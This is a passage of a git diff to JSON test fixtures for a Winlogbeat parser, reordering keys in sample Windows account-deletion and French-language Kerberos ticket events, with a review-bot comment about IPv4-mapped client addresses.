Management\",\"outcome\":\"success\",\"code\":\"4726\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"kind\":\"event\",\"created\":\"2024-11-12T07:58:14.553Z\"},\"agent\":{\"hostname\":\"hostname\",\"id\":\"12345678-ABCD-ef90-1234-abcdef123456\",\"type\":\"winlogbeat\",\"name\":\"hostname\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"version\":\"7.17.1\"},\"zone\":\"int\",\"site\":\"site\",\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"process\":{\"pid\":632,\"thread\":{\"id\":2056}},\"event_data\":{\"SubjectLogonId\":\"0x3005c1f76\",\"PrivilegeList\":\"-\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"doe.j\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\",\"TargetUserName\":\"smithee.a\",\"TargetDomainName\":\"DOMAIN\"},\"record_id\":25349190364,\"event_id\":\"4726\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"task\":\"User Account Management\",\"computer_name\":\"hostname.domain.net\"},\"ecs\":{\"version\":\"1.12.0\"},\"host\":{\"name\":\"hostname.domain.net\"},\"tags\":[\"windows\",\"domain-controller\",\"beats_input_codec_plain_applied\"]}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": "{\"@version\":\"1\",\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T07:58:13.288Z\",\"message\":\"A user 
account was deleted.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tdoe.j\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3005C1F76\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tsmithee.a\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t-\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"code\":\"4726\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"kind\":\"event\",\"created\":\"2024-11-12T07:58:14.553Z\"},\"agent\":{\"hostname\":\"hostname\",\"id\":\"12345678-ABCD-ef90-1234-abcdef123456\",\"type\":\"winlogbeat\",\"name\":\"hostname\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"version\":\"7.17.1\"},\"zone\":\"int\",\"site\":\"site\",\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"process\":{\"pid\":632,\"thread\":{\"id\":2056}},\"event_data\":{\"SubjectLogonId\":\"0x3005c1f76\",\"PrivilegeList\":\"-\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"doe.j\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\",\"TargetUserName\":\"smithee.a\",\"TargetDomainName\":\"DOMAIN\"},\"record_id\":25349190364,\"event_id\":\"4726\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"task\":\"User Account Management\",\"computer_name\":\"hostname.domain.net\"},\"ecs\":{\"version\":\"1.12.0\"},\"host\":{\"name\":\"hostname.domain.net\"},\"tags\":[\"windows\",\"domain-controller\",\"beats_input_codec_plain_applied\"]}" + } }, "expected": { "message": "{\"@version\":\"1\",\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T07:58:13.288Z\",\"message\":\"A user account was deleted.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tdoe.j\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3005C1F76\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tsmithee.a\\n\\tAccount 
Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t-\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"code\":\"4726\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"kind\":\"event\",\"created\":\"2024-11-12T07:58:14.553Z\"},\"agent\":{\"hostname\":\"hostname\",\"id\":\"12345678-ABCD-ef90-1234-abcdef123456\",\"type\":\"winlogbeat\",\"name\":\"hostname\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"version\":\"7.17.1\"},\"zone\":\"int\",\"site\":\"site\",\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"process\":{\"pid\":632,\"thread\":{\"id\":2056}},\"event_data\":{\"SubjectLogonId\":\"0x3005c1f76\",\"PrivilegeList\":\"-\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"doe.j\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\",\"TargetUserName\":\"smithee.a\",\"TargetDomainName\":\"DOMAIN\"},\"record_id\":25349190364,\"event_id\":\"4726\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"task\":\"User Account Management\",\"computer_name\":\"hostname.domain.net\"},\"ecs\":{\"version\":\"1.12.0\"},\"host\":{\"name\":\"hostname.domain.net\"},\"tags\":[\"windows\",\"domain-controller\",\"beats_input_codec_plain_applied\"]}", diff --git a/Beats/winlogbeat/tests/security_event_4768.json b/Beats/winlogbeat/tests/security_event_4768.json index 53d650df2..c7ac196ea 100644 --- a/Beats/winlogbeat/tests/security_event_4768.json +++ b/Beats/winlogbeat/tests/security_event_4768.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4768\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:12.392Z\",\"action\":\"Service d\u2019authentification Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:10.124Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service 
:\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOSTNAME.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Service d\u2019authentification Kerberos\",\"computer_name\":\"HOSTNAME.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810010\",\"IpPort\":\"51261\",\"TargetDomainName\":\"DOMAIN\",\"TargetUserName\":\"account\",\"TargetSid\":\"S-1-2-3\",\"PreAuthType\":\"2\",\"Status\":\"0x0\",\"ServiceSid\":\"S-1-2-3-4-5\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"service\"},\"process\":{\"thread\":{\"id\":3228},\"pid\":560},\"event_id\":\"4768\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587536},\"@version\":\"1\"}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - 
"message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4768\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:12.392Z\",\"action\":\"Service d\u2019authentification Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:10.124Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le 
r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOSTNAME.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Service d\u2019authentification Kerberos\",\"computer_name\":\"HOSTNAME.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810010\",\"IpPort\":\"51261\",\"TargetDomainName\":\"DOMAIN\",\"TargetUserName\":\"account\",\"TargetSid\":\"S-1-2-3\",\"PreAuthType\":\"2\",\"Status\":\"0x0\",\"ServiceSid\":\"S-1-2-3-4-5\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"service\"},\"process\":{\"thread\":{\"id\":3228},\"pid\":560},\"event_id\":\"4768\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587536},\"@version\":\"1\"}" + } }, "expected": { "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket d\u2019authentification Kerberos (TGT) a 
\u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4768\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:12.392Z\",\"action\":\"Service d\u2019authentification Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:10.124Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket 
:\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOSTNAME.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Service d\u2019authentification Kerberos\",\"computer_name\":\"HOSTNAME.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810010\",\"IpPort\":\"51261\",\"TargetDomainName\":\"DOMAIN\",\"TargetUserName\":\"account\",\"TargetSid\":\"S-1-2-3\",\"PreAuthType\":\"2\",\"Status\":\"0x0\",\"ServiceSid\":\"S-1-2-3-4-5\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"service\"},\"process\":{\"thread\":{\"id\":3228},\"pid\":560},\"event_id\":\"4768\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587536},\"@version\":\"1\"}", diff --git a/Beats/winlogbeat/tests/security_event_4769.json b/Beats/winlogbeat/tests/security_event_4769.json index 7b1f0f39d..ac4cdd94d 100644 --- a/Beats/winlogbeat/tests/security_event_4769.json +++ b/Beats/winlogbeat/tests/security_event_4769.json 
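Review bot: The Kerberos client address in the new `input.message` is the IPv4-mapped IPv6 form `::ffff:1.2.3.4` (both in `winlog.event_data.IpAddress` and in the message text), and the `expected` section that would show how the parser renders it is cut off at the hunk boundary, so it is not visible whether the test pins the normalized `1.2.3.4` or the raw mapped form. If the intake keeps `::ffff:1.2.3.4`, detection rules and allowlists written against plain IPv4 source addresses will not match these 4768 events; please confirm the expectation asserts the normalized IPv4 value, or that the parser strips the `::ffff:` prefix before populating the source address field. The same applies to the security_event_4769.json hunk below, whose input carries the identical mapped address.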
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. 
L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4769\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:05.023Z\",\"action\":\"Op\u00e9rations de ticket du service Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:02.856Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. 
L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOST01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Op\u00e9rations de ticket du service Kerberos\",\"computer_name\":\"HOST01.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810000\",\"LogonGuid\":\"{12345678-ABCD-EF90-1234-123456ABCDEF}\",\"IpPort\":\"50754\",\"TargetDomainName\":\"DOMAIN.PRIV\",\"TargetUserName\":\"account@DOMAIN.PRIV\",\"ServiceSid\":\"S-1-2-3\",\"Status\":\"0x0\",\"TransmittedServices\":\"-\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"SERVICE$\"},\"process\":{\"thread\":{\"id\":7992},\"pid\":560},\"event_id\":\"4769\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587153},\"@version\":\"1\"}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service 
:\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4769\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:05.023Z\",\"action\":\"Op\u00e9rations de ticket du service Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:02.856Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du 
client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOST01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Op\u00e9rations de ticket du service Kerberos\",\"computer_name\":\"HOST01.domain.priv\",\"keywords\":[\"Succ\u00e8s de 
